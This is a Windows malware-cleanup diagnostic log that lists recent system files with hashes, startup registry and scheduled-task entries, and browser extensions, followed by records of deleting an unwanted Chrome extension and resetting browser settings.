2015-01-15 05:38:26   FE48346938C1CDDDF4E4097DB9B99764   52224   ----a-w-   C:\Windows

\SysWOW64\nlaapi.dll
2015-01-15 05:38:26   92940397DFFB4D237EA5BB22FF912BDC   156672   ----a-w-   C:\Windows

\SysWOW64\ncsi.dll
2015-01-15 05:38:01   2AF481C03C0383ADE09FFEDA0C583140   3971512   ----a-w-   C:\Windows

\SysWOW64\ntkrnlpa.exe
2015-01-15 05:38:00   9606307F5E1EABA98ACB61206EFC2127   43008   ----a-w-   C:\Windows

\SysWOW64\srclient.dll
2015-01-15 05:38:00   8A289EF0AE709327D6AA9769E108B5A6   3916728   ----a-w-   C:\Windows

\SysWOW64\ntoskrnl.exe
2015-01-15 05:37:34   0C9988BDA3CEC3C421B773982C5E2EC6   5703168   ----a-w-   C:\Windows

\SysWOW64\mstscax.dll
2015-01-13 14:53:00   8DEEE20D8D30E9B0FBDCA31E58A027BD   53248   ----a-w-   C:\Windows

\SysWOW64\tsgqec.dll
2015-01-13 14:52:59   AB5EFB103DB01C1912C9D2F545EA5621   17920   ----a-w-   C:\Windows

\SysWOW64\wksprtPS.dll
2015-01-13 14:52:59   5E676B296B762E211D83B87635F2C330   855552   ----a-w-   C:\Windows

\SysWOW64\rdvidcrl.dll
2015-01-13 14:52:59   4676AAA9DDF52A50C829FEDB4EA81E54   1068544   ----a-w-   C:\Windows

\SysWOW64\mstsc.exe
2015-01-13 14:52:59   2EFB1279E7BEA7D12D9F4D6508D27880   50176   ----a-w-   C:\Windows

\SysWOW64\MsRdpWebAccess.dll
2015-01-13 14:51:47   8999F18D38D55E34D356796507FFD639   192000   ----a-w-   C:\Windows

\SysWOW64\rdpendp_winip.dll
====== C:\Windows\SysWOW64\drivers =====
====== C:\Windows\Sysnative =====
2015-01-15 05:38:26   B6A58491307B4CADA572583D863DC602   210432   ----a-w-   C:\Windows\Sysnative

\profsvc.dll
2015-01-15 05:38:26   8B301D474B478E9A92823BAB50A7BC49   303616   ----a-w-   C:\Windows\Sysnative

\nlasvc.dll
2015-01-15 05:38:18   E9CB5F138943D383DB67F29AAB60453F   3179520   ----a-w-   C:\Windows\Sysnative

\rdpcorets.dll
2015-01-15 05:38:18   2147C5330F983D76A36B73F4A804F778   16384   ----a-w-   C:\Windows\Sysnative

\RdpGroupPolicyExtension.dll
2015-01-15 05:38:06   2A9C3ADBC3B9D061CACDEFFBED67683C   87040   ----a-w-   C:\Windows\Sysnative

\TSWbPrxy.exe
2015-01-15 05:38:01   0A70B8D78AF95894E221DDAC6482DF6D   5553592   ----a-w-   C:\Windows\Sysnative

\ntoskrnl.exe
2015-01-15 05:38:00   F4846789B3795F14DCB7D92ED1DAF74F   503808   ----a-w-   C:\Windows\Sysnative

\srcore.dll
2015-01-15 05:38:00   DE595EACC79006E7B15B848BF0831E78   296960   ----a-w-   C:\Windows\Sysnative

\rstrui.exe
2015-01-15 05:38:00   BA6D609BAB615991E8791CA1DFFD034C   50176   ----a-w-   C:\Windows\Sysnative

\srclient.dll
2015-01-15 05:37:34   6DD73E4E947DB3B0608321AE13210D94   6584320   ----a-w-   C:\Windows\Sysnative

\mstscax.dll
2015-01-13 14:53:01   DDED7C5558B3AE09F568945281A9A6D1   44544   ----a-w-   C:\Windows\Sysnative

\TsUsbGDCoInstaller.dll
2015-01-13 14:53:00   FEC6178962DFF33074D39CA907971405   12800   ----a-w-   C:\Windows\Sysnative

\TsUsbRedirectionGroupPolicyExtension.dll
2015-01-13 14:53:00   5289A00E2D21BB3A7D6761646543ED5C   62976   ----a-w-   C:\Windows\Sysnative

\tsgqec.dll
2015-01-13 14:53:00   108C257D765AAD2E6EC46557DA0B02BD   13824   ----a-w-   C:\Windows\Sysnative

\TsUsbRedirectionGroupPolicyControl.exe
2015-01-13 14:52:59   A4420969E5AB94856E5C0C02E6099D3F   1057280   ----a-w-   C:\Windows\Sysnative

\rdvidcrl.dll
2015-01-13 14:52:59   8E75B1112C374EBDF18FD640DA2F0655   1147392   ----a-w-   C:\Windows\Sysnative

\mstsc.exe
2015-01-13 14:52:59   7BD2E6E2458A5B95F8341244C7FC7DD4   18944   ----a-w-   C:\Windows\Sysnative

\wksprtPS.dll
2015-01-13 14:52:59   79EE5ECB4BE89343E4CF1E48F7769F59   420864   ----a-w-   C:\Windows\Sysnative

\wksprt.exe
2015-01-13 14:52:59   149A388C17F04AD1F99B477A43BE1A9F   56832   ----a-w-   C:\Windows\Sysnative

\MsRdpWebAccess.dll
2015-01-13 14:51:47   D346E07D62E3D4BEAB040939744EC31B   228864   ----a-w-   C:\Windows\Sysnative

\rdpendp_winip.dll
2015-01-13 14:51:47   AD4D0AEDB5993EDA31EB80A54EDBC344   243200   ----a-w-   C:\Windows\Sysnative

\rdpudd.dll
====== C:\Windows\Sysnative\drivers =====
2015-01-21 06:30:17   FD44FA80DA03EA144153A76DEBBB61B4   35064   ----a-w-   C:\Windows\Sysnative

\drivers\TrueSight.sys
2015-01-15 05:38:23   AE3334958D8F631FF14A0AEB3D7EFB3A   141312   ----a-w-   C:\Windows\Sysnative

\drivers\mrxdav.sys
2015-01-13 14:53:00   E9981ECE8D894CEF7038FD1D040EB426   56832   ----a-w-   C:\Windows\Sysnative

\drivers\TsUsbFlt.sys
2015-01-13 14:51:54   AD64450A4ABE076F5CB34CC08EEACB07   30208   ----a-w-   C:\Windows\Sysnative

\drivers\TsUsbGD.sys
2015-01-13 14:51:54   313F68E1A3E6345A4F47A36B07062F34   19456   ----a-w-   C:\Windows\Sysnative

\drivers\rdpvideominiport.sys
2015-01-07 02:51:42   26C43960C99EE861A5D0EDC4DCF3B1C3   129752   ----a-w-   C:\Windows\Sysnative

\drivers\67F23A27.sys
2015-01-07 02:50:39   26C43960C99EE861A5D0EDC4DCF3B1C3   129752   ----a-w-   C:\Windows\Sysnative

\drivers\12D43959.sys
====== C:\Windows\Tasks ======
2015-01-04 17:45:22   B63AD96D5AB77552EFDB7D2277C3B0CB   3886   ----a-w-   C:\Windows\Sysnative\Tasks

\Adobe Acrobat Update Task
====== C:\Windows\Temp ======
======= C:\Program Files =====
======= C:\PROGRA~2 =====
2015-01-19 18:13:20   --------   d-----w-   C:\PROGRA~2\ERUNT
=======  =====
====== C:\Users\Admin\AppData\Roaming ======
2015-01-22 05:29:31   --------   d-----w-   C:\Users\Admin\AppData\Roaming\Mozilla
2015-01-22 05:29:31   --------   d-----w-   C:\Users\Admin\AppData\Local\Mozilla
2015-01-22 05:29:17   --------   d-----w-   C:\Users\Admin\AppData\Roaming\ATI
2015-01-22 05:29:17   --------   d-----w-   C:\Users\Admin\AppData\Local\ATI
2015-01-22 05:28:37   --------   d-----w-   C:\Users\Admin\AppData\Roaming\OEM
2015-01-22 05:28:37   --------   d-----w-   C:\Users\Admin\AppData\Roaming\ControlCenter4
2015-01-22 05:28:37   --------   d-----w-   C:\Users\Admin\AppData\Roaming\Apple Computer
2015-01-22 05:28:36   450364B2CEFFCE88126C0F9B36C843D3   438944   ----a-w-   C:\Users\Admin\AppData

\Local\GDIPFONTCACHEV1.DAT
2015-01-22 05:28:14   --------   d-----w-   C:\Users\Admin\AppData\Roaming\Identities
2015-01-21 06:32:33   --------   d-sh--w-   C:\Users\Admin\AppData\Local\EmieUserList
2015-01-21 06:32:33   --------   d-sh--w-   C:\Users\Admin\AppData\Local\EmieSiteList
2015-01-21 06:32:33   --------   d-sh--w-   C:\Users\Admin\AppData\Local\EmieBrowserModeList
2015-01-21 06:32:32   --------   d-----w-   C:\Users\Admin\AppData\Roaming\Adobe
2015-01-21 06:30:16   --------   d-s---w-   C:\Users\Admin\AppData\Locallow\Microsoft
2015-01-17 22:48:11   --------   d-----r-   C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start

Menu\Programs\Startup
2015-01-17 22:48:11   --------   d-----r-   C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start

Menu\Programs\Administrative Tools
2015-01-17 04:21:02   --------   d-s---w-   C:\Users\Admin\AppData\Roaming\Microsoft
2015-01-17 04:21:02   --------   d-----w-   C:\Users\Admin\AppData\Roaming\Media Center Programs
2015-01-17 04:21:02   --------   d-----w-   C:\Users\Admin\AppData\Local\Temp
2015-01-17 04:21:02   --------   d-----w-   C:\Users\Admin\AppData\Local\Microsoft Help
2015-01-17 04:21:02   --------   d-----w-   C:\Users\Admin\AppData\Local\Microsoft
2015-01-17 04:21:02   --------   d-----r-   C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start

Menu\Programs\Maintenance
2015-01-17 04:21:02   --------   d-----r-   C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start

Menu\Programs\Accessories
====== C:\Users\Admin ======
2015-01-22 07:02:22   0DD7CD28C36F909EF7EE0C8628D687F3   37987520   ----a-w-   C:\Users\Admin

\Desktop\Windows-KB890830-x64-V5.20.exe
2015-01-22 06:50:44   B9E1BF24EF01A82701B09BE75D294085   1707939   ----a-w-   C:\Users\Admin\Desktop

\JRT.exe
2015-01-22 05:28:21   --------   d-----r-   C:\Users\Admin\Searches
2015-01-22 05:28:12   --------   d-----r-   C:\Users\Admin\Contacts
2015-01-21 06:30:15   --------   d-----w-   C:\ProgramData\RogueKiller
2015-01-19 18:13:20   --------   d-----w-   C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ERUNT
2015-01-17 04:21:02   6FC234AD3752E1267B34FB12BCD6718B   20   --sh--w-   C:\Users\Admin\ntuser.ini
2015-01-17 04:21:02   --------   d--h--w-   C:\Users\Admin\AppData
2015-01-17 04:21:02   --------   d-----r-   C:\Users\Admin\Videos
2015-01-17 04:21:02   --------   d-----r-   C:\Users\Admin\Saved Games
2015-01-17 04:21:02   --------   d-----r-   C:\Users\Admin\Pictures
2015-01-17 04:21:02   --------   d-----r-   C:\Users\Admin\Music
2015-01-17 04:21:02   --------   d-----r-   C:\Users\Admin\Links
2015-01-17 04:21:02   --------   d-----r-   C:\Users\Admin\Favorites
2015-01-17 04:21:02   --------   d-----r-   C:\Users\Admin\Downloads
2015-01-17 04:21:02   --------   d-----r-   C:\Users\Admin\Documents
2015-01-17 04:21:02   --------   d-----r-   C:\Users\Admin\Desktop
2015-01-07 16:57:55   --------   d-----w-   C:\ProgramData\pnikjcemimhgahpjiapnjbejoigfkjcj

====== C: exe-files ==
2015-01-23 02:07:17   2E0323A94915FAAB10A25F3BABF82584   157696   ----a-w-   C:\Users\Admin\AppData

\Local\Temp\jrt\erunt\ERUNT.EXE
2015-01-22 07:02:22   0DD7CD28C36F909EF7EE0C8628D687F3   37987520   ----a-w-   C:\Users\Admin

\Desktop\Windows-KB890830-x64-V5.20.exe
2015-01-22 06:50:44   B9E1BF24EF01A82701B09BE75D294085   1707939   ----a-w-   C:\Users\Admin\Desktop

\JRT.exe
2015-01-22 05:56:04   6EA377DA154B0111D59AE70C35F9864E   2186752   ----a-w-   C:\Users\Admin\Desktop

\SpywareHammerArchivedTools\AdwCleaner.exe
2015-01-21 04:51:01   68CCB93315E8986024CE2621720E64F7   15431256   ----a-w-   C:\Users\Admin

\Desktop\SpywareHammerArchivedTools\RogueKiller.exe
2015-01-21 04:50:20   DD55080C38BF607930A99950B95B0814   2126848   ----a-w-   C:\Users\Admin\Desktop

\SpywareHammerArchivedTools\FRST64.exe
2015-01-19 18:10:33   933169EEE58B90EB0900CD3B0AF02FD8   791393   ----a-w-   C:\Users\Admin\Desktop

\SpywareHammerArchivedTools\erunt-setup.exe
=== C: other files ==
2015-01-23 02:07:17   F720D6634E048B0AD485CEEF55263E6B   191092   ----a-w-   C:\Users\Admin\AppData

\Local\Temp\jrt\misc.bat
2015-01-23 02:07:17   F56A319979F631C141F5FF02DF87FDB1   43563   ----a-w-   C:\Users\Admin\AppData

\Local\Temp\jrt\prelim.bat
2015-01-23 02:07:17   DD1E4D974B1672ABD09EFFB225791C4A   1230   ----a-w-   C:\Users\Admin\AppData

\Local\Temp\jrt\TDL4.bat
2015-01-23 02:07:17   C4C784C659C27DB5ED395A7901611C71   14957   ----a-w-   C:\Users\Admin\AppData

\Local\Temp\jrt\get.bat
2015-01-23 02:07:17   AD2F52DC72B10AF331692E4A4DD80DFC   18670   ----a-w-   C:\Users\Admin\AppData

\Local\Temp\jrt\medfos.bat
2015-01-23 02:07:17   AA0C656F898523BEDF2DA6923197BB80   1264   ----a-w-   C:\Users\Admin\AppData

\Local\Temp\jrt\surfvox.bat
2015-01-23 02:07:17   A3945FA06DB607245C6A1D0629CE737E   11057   ----a-w-   C:\Users\Admin\AppData

\Local\Temp\jrt\runvalues.bat
2015-01-23 02:07:17   8E6020C14F982CF11B3FE7DBB0CB8EDE   24738   ----a-w-   C:\Users\Admin\AppData

\Local\Temp\jrt\searchlnk.bat
2015-01-23 02:07:17   86707BCE5CBB65D9B1C41E249B4423BA   152733   ----a-w-   C:\Users\Admin\AppData

\Local\Temp\jrt\firefox.bat
2015-01-23 02:07:17   83F691D8398F0E37E71E9355BF730DB9   719   ----a-w-   C:\Users\Admin\AppData

\Local\Temp\jrt\ev_clear.bat
2015-01-23 02:07:17   38A0BDF322ACCC968B0A824C38D50157   29635   ----a-w-   C:\Users\Admin\AppData

\Local\Temp\jrt\ask.bat
2015-01-23 02:07:17   335DFF8F23E5EC02B5426362F0F8509B   31401   ----a-w-   C:\Users\Admin\AppData

\Local\Temp\jrt\iexplore.bat
2015-01-23 02:07:17   0C4649A62845AB5D5DBCC4998477FF6D   1813   ----a-w-   C:\Users\Admin\AppData

\Local\Temp\jrt\delfolders.bat
2015-01-23 02:07:17   080CFDE64F31E7B50EECF4552033E84D   9937   ----a-w-   C:\Users\Admin\AppData

\Local\Temp\jrt\mws.bat
2015-01-23 02:07:17   048407135C9B1FB6A355E256BD96160D   14192   ----a-w-   C:\Users\Admin\AppData

\Local\Temp\jrt\chrome.bat
2015-01-21 06:30:17   FD44FA80DA03EA144153A76DEBBB61B4   35064   ----a-w-   C:\Windows

\System32\drivers\TrueSight.sys

==== Startup Registry Enabled ======================

[HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Run]
"Sidebar"="%ProgramFiles%\Windows\Sidebar.exe /autoRun"

[HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Run]
"Sidebar"="%ProgramFiles%\Windows\Sidebar.exe /autoRun"

[HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\Windows\CurrentVersion\Run]
"Sidebar"="C:\Program Files\Windows Sidebar\sidebar.exe /autoRun"
"ISUSPM"="C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe -scheduler"
"OfficeSyncProcess"="C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE"
"Spotify Web Helper"="C:\Users\Bonnie\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe"

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\RunOnce]

[HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"mctadmin"="C:\Windows\System32\mctadmin.exe"

[HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"mctadmin"="C:\Windows\System32\mctadmin.exe"

[HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\RunOnce]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Norton Online Backup"="C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe"
"StartCCC"="C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe MSRun"
"RemoteControl10"="C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe"
"Hotkey Utility"="C:\Program Files (x86)\Gateway\Hotkey Utility\HotkeyUtility.exe"
"BCSSync"="C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe /DelayServices"
"APSDaemon"="C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
"iTunesHelper"="C:\Program Files (x86)\iTunes\iTunesHelper.exe"
"IndexSearch"="C:\Program Files (x86)\Nuance\PaperPort\IndexSearch.exe"
"PaperPort PTD"="C:\Program Files (x86)\Nuance\PaperPort\pptd40nt.exe"
"PPort12reminder"="C:\Program Files (x86)\Nuance\PaperPort\Ereg\Ereg.exe -r C:\ProgramData\ScanSoft\PaperPort

\12\Config\Ereg\Ereg.ini"
"PDFHook"="C:\Program Files (x86)\Nuance\PDF Viewer Plus\pdfpro5hook.exe"
"PDF5 Registry Controller"="C:\Program Files (x86)\Nuance\PDF Viewer Plus\RegistryController.exe"
"ControlCenter4"="C:\Program Files (x86)\ControlCenter4\BrCcBoot.exe /autorun"
"BrStsMon00"="C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe /AUTORUN"

==== Startup Registry Enabled x64 ======================

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RtHDVCpl"="C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s"

==== Startup Folders ======================

2012-12-03 03:10:16   1147   ----a-w-   C:\Users\Bonnie\AppData\Roaming\Microsoft\Windows\Start Menu

\Programs\Startup\Dropbox.lnk
2012-05-29 13:10:36   1949   ----a-w-   C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Event

Reminder.lnk
2012-11-14 01:53:57   1192   ----a-w-   C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

\ImageBrowser EX Agent.lnk

==== Task Scheduler Jobs ======================

C:\Windows\tasks\Adobe Flash Player Updater.job --a------ C:\Windows\SysWOW64\Macromed\Flash

\FlashPlayerUpdateService.exe [01/14/2015 11:56 PM]

==== Other Scheduled Tasks ======================

"C:\Windows\SysNative\tasks\Adobe Acrobat Update Task" [C:\Program Files (x86)\Common Files\Adobe\ARM

\1.0\AdobeARM.exe]
"C:\Windows\SysNative\tasks\Adobe ARM" ["C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"]
"C:\Windows\SysNative\tasks\Adobe Flash Player Updater" [C:\Windows\SysWOW64\Macromed\Flash

\FlashPlayerUpdateService.exe]
"C:\Windows\SysNative\tasks\Adobe Reader Speed Launcher" ["C:\Program Files (x86)\Adobe\Reader 10.0\Reader

\Reader_sl.exe"]
"C:\Windows\SysNative\tasks\DeviceDetector" [C:\Program Files (x86)\CyberLink\MediaEspresso\DeviceDetector

\DeviceDetector.exe]
"C:\Windows\SysNative\tasks\GoogleUpdateTaskUserS-1-5-21-2977827394-2594518940-965070511-1000Core" [C:\Users

\Bonnie\AppData\Local\Google\Update\GoogleUpdate.exe]
"C:\Windows\SysNative\tasks\GoogleUpdateTaskUserS-1-5-21-2977827394-2594518940-965070511-1000UA" [C:\Users\Bonnie

\AppData\Local\Google\Update\GoogleUpdate.exe]
"C:\Windows\SysNative\tasks\NBAgent" [C:\Program Files (x86)\Nero\Nero 10\Nero BackItUp\NBAgent.exe]
"C:\Windows\SysNative\tasks\Norton WSC Integration" ["C:\Program Files (x86)\Norton Internet Security\Engine

\19.9.1.14\WSCStub.exe"]
"C:\Windows\SysNative\tasks\Apple\AppleSoftwareUpdate" [C:\Program Files (x86)\Apple Software Update

\SoftwareUpdate.exe]
"C:\Windows\SysNative\tasks\Norton Internet Security\Norton Error Analyzer" [C:\Program Files (x86)\Norton Internet

Security\Engine\19.9.1.14\SymErr.exe]
"C:\Windows\SysNative\tasks\Norton Internet Security\Norton Error Processor" [C:\Program Files (x86)\Norton

Internet Security\Engine\19.9.1.14\SymErr.exe]
"C:\Windows\SysNative\tasks\OfficeSoftwareProtectionPlatform\SvcRestartTask" [%systemroot%\system32\sc.exe start

osppsvc]

==== Firefox Start and Search pages ======================

ProfilePath: C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p7xuz79o.default
user_pref("browser.startup.homepage", "about:home");
user_pref("browser.newtab.url", "about:newtab");

ProfilePath: C:\Users\Bonnie\AppData\Roaming\Mozilla\Firefox\Profiles\7rgneeol.default
user_pref("browser.startup.homepage", "about:home");
user_pref("browser.newtab.url", "about:newtab");

==== Firefox Extensions Registry ======================

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Mozilla\Firefox\Extensions]
"online_banking@kaspersky.com"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt

\online_banking@kaspersky.com" [12/17/2014 09:51 AM]

==== Firefox Extensions ======================

AppDir: C:\Program Files (x86)\Mozilla Firefox
- Default - %AppDir%\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}

==== Firefox Plugins ======================

Profilepath: C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p7xuz79o.default
8560995C727974F27F2A1CE68909FEB9   - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_16_0_0_257.dll -   Shockwave

Flash


==== Chromium Look ======================

HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\Extensions
blbkdnmdcafmfhinpmnlhhddbepgkeaa - https://chrome.google.com/webstore/detail/blbkdnmdcafmfhinpmnlhhddbepgkeaa[]
dchlnpcodkpfdpacogkljefecpegganj - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security

14.0.0\ChromeExt\urladvisor.crx[10/08/2013 01:50 PM]
hakdifolhalapjijoafobooafbilfakh - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security

14.0.0\ChromeExt\online_banking_chrome.crx[10/08/2013 01:50 PM]
hghkgaeecgjhjkannahfamoehjmkjail - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security

14.0.0\ChromeExt\content_blocker_chrome.crx[10/08/2013 01:50 PM]
jagncdcchgajhfhijbbhecadmaiegcmh - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security

14.0.0\ChromeExt\virtkbd.crx[12/17/2014 09:49 AM]
mgekkbflbjgdcmbphhpaikbmjbifkaib - C:\Users\Bonnie\AppData\Local\CRE\mgekkbflbjgdcmbphhpaikbmjbifkaib.crx[]
pjldcfjmnllhmgjclecdnfampinooman - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security

14.0.0\ChromeExt\ab.crx[10/08/2013 01:50 PM]

Kaspersky Protection - Bonnie\AppData\Local\Google\Chrome\User Data\Default\Extensions

\blbkdnmdcafmfhinpmnlhhddbepgkeaa
YouTube - Bonnie\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo
Google Search - Bonnie\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf
Kaspersky URL Advisor - Bonnie\AppData\Local\Google\Chrome\User Data\Default\Extensions

\dchlnpcodkpfdpacogkljefecpegganj
Safe Money - Bonnie\AppData\Local\Google\Chrome\User Data\Default\Extensions\hakdifolhalapjijoafobooafbilfakh
Dangerous Websites Blocker - Bonnie\AppData\Local\Google\Chrome\User Data\Default\Extensions

\hghkgaeecgjhjkannahfamoehjmkjail
shopndrop - Bonnie\AppData\Local\Google\Chrome\User Data\Default\Extensions\jggpdnkhlpbjdkpkhcnbmcjedfgnbdek
Google Wallet - Bonnie\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda
Gmail - Bonnie\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia
Anti-Banner - Bonnie\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjldcfjmnllhmgjclecdnfampinooman

==== Chromium Startpages ======================

C:\Users\Bonnie\AppData\Local\Google\Chrome\User Data\Default\Preferences
"homepage": "http://partnerpage.google.com/bridgemail.com",
"startup_urls": [ "http://www.google.com/", "http://lds.org/" ],


==== Chromium Fix ======================

C:\Users\Bonnie\AppData\Local\Google\Chrome\User Data\Default\Local Storage

\https_static.selectgo00.selectgo.net_0.localstorage deleted successfully
C:\Users\Bonnie\AppData\Local\Google\Chrome\User Data\Default\Extensions\jggpdnkhlpbjdkpkhcnbmcjedfgnbdek deleted

successfully

==== Set IE to Default ======================

Old Values:
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://go.microsoft.com/fwlink/p/?LinkId=255141"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\AboutURLs]
"Tabs"="www.google.com"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\AboutURLs]
"Tabs"="www.google.com"

New Values:
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://go.microsoft.com/fwlink/p/?LinkId=255141"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\AboutURLs]
"Tabs"="res://ieframe.dll/tabswelcome.htm"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\AboutURLs]
"Tabs"="res://ieframe.dll/tabswelcome.htm"

==== All HKCU SearchScopes ======================

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes
"DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}"
{012E1000-F331-11DB-8314-0800200C9A66} Google  Url="http://www.google.com/search?q={searchTerms}"
{0633EE93-D776-472f-A0FF-E1416B8B2E3A} Bing  Url="http://www.bing.com/search?q={searchTerms}&src=IE-

SearchBox&FORM=IE8SRC"
{6A1806CD-94D4-4689-BA73-E35EA1EA9990} Unknown  Url="Not_Found"

==== Reset Google Chrome ======================

C:\Users\Bonnie\AppData\Local\Google\Chrome\User Data\Default\Preferences was reset successfully
C:\Users\Bonnie\AppData\Local\Google\Chrome\User Data\Default\Web Data was reset successfully

==== Deleting CLSID Registry Keys ======================

HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1008\Software\Microsoft\Internet Explorer\SearchScopes

\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} deleted successfully

==== Deleting CLSID Registry Values ======================


==== Deleting Registry Keys ======================

HKEY_LOCAL_MACHINE\Software\wow6432node\Policies\Google deleted successfully
HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Google\Chrome\Extensions\mgekkbflbjgdcmbphhpaikbmjbifkaib deleted

successfully

==== HijackThis Entries ======================

F2 - REG:system.ini: UserInit=userinit.exe,
O2 - BHO: PlusIEEventHelper Class - {551A852F-39A6-44A7-9C13-AFBEC9185A9D} - C:\Program Files (x86)\Nuance\PDF

Viewer Plus\Bin\PlusIEContextMenu.dll
O2 - BHO: ContentBlockerBrowserHelperObject - {5564CC73-EFA7-4CBF-918A-5CF7FBBFFF4F} - C:\Program Files

(x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\ContentBlocker\ie_content_blocker_plugin.dll
O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:

\PROGRA~2\MICROS~4\Office14\GROOVEEX.DLL
O2 - BHO: VirtualKeyboardBrowserHelperObject - {73455575-E40C-433C-9784-C78DC7761455} - C:\Program Files

(x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll
O2 - BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common

Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Safe Money Plugin - {9E6D0D23-3D72-4A94-AE1F-2D167624E3D9} - C:\Program Files (x86)\Kaspersky Lab

\Kaspersky Internet Security 14.0.0\IEExt\OnlineBanking\online_banking_bho.dll
O2 - BHO: URLRedirectionBHO - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\PROGRA~2\MICROS~4\Office14\URLREDIR.DLL
O2 - BHO: link filter bho - {E33CF602-D945-461A-83F0-819F76A199F8} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky

Internet Security 14.0.0\IEExt\UrlAdvisor\klwtbbho.dll
O4 - HKLM\..\Run: [Norton Online Backup] C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe
O4 - HKLM\..\Run: [StartCCC] "C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" MSRun
O4 - HKLM\..\Run: [RemoteControl10] "C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe"
O4 - HKLM\..\Run: [Hotkey Utility] C:\Program Files (x86)\Gateway\Hotkey Utility\HotkeyUtility.exe
O4 - HKLM\..\Run: [BCSSync] "C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe" /DelayServices
O4 - HKLM\..\Run: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [IndexSearch] "C:\Program Files (x86)\Nuance\PaperPort\IndexSearch.exe"
O4 - HKLM\..\Run: [PaperPort PTD] "C:\Program Files (x86)\Nuance\PaperPort\pptd40nt.exe"
O4 - HKLM\..\Run: [PPort12reminder] "C:\Program Files (x86)\Nuance\PaperPort\Ereg\Ereg.exe" -r "C:\ProgramData

\ScanSoft\PaperPort\12\Config\Ereg\Ereg.ini"
O4 - HKLM\..\Run: [PDFHook] C:\Program Files (x86)\Nuance\PDF Viewer Plus\pdfpro5hook.exe
O4 - HKLM\..\Run: [PDF5 Registry Controller] C:\Program Files (x86)\Nuance\PDF Viewer Plus\RegistryController.exe
O4 - HKLM\..\Run: [ControlCenter4] C:\Program Files (x86)\ControlCenter4\BrCcBoot.exe /autorun
O4 - HKLM\..\Run: [BrStsMon00] C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe /AUTORUN
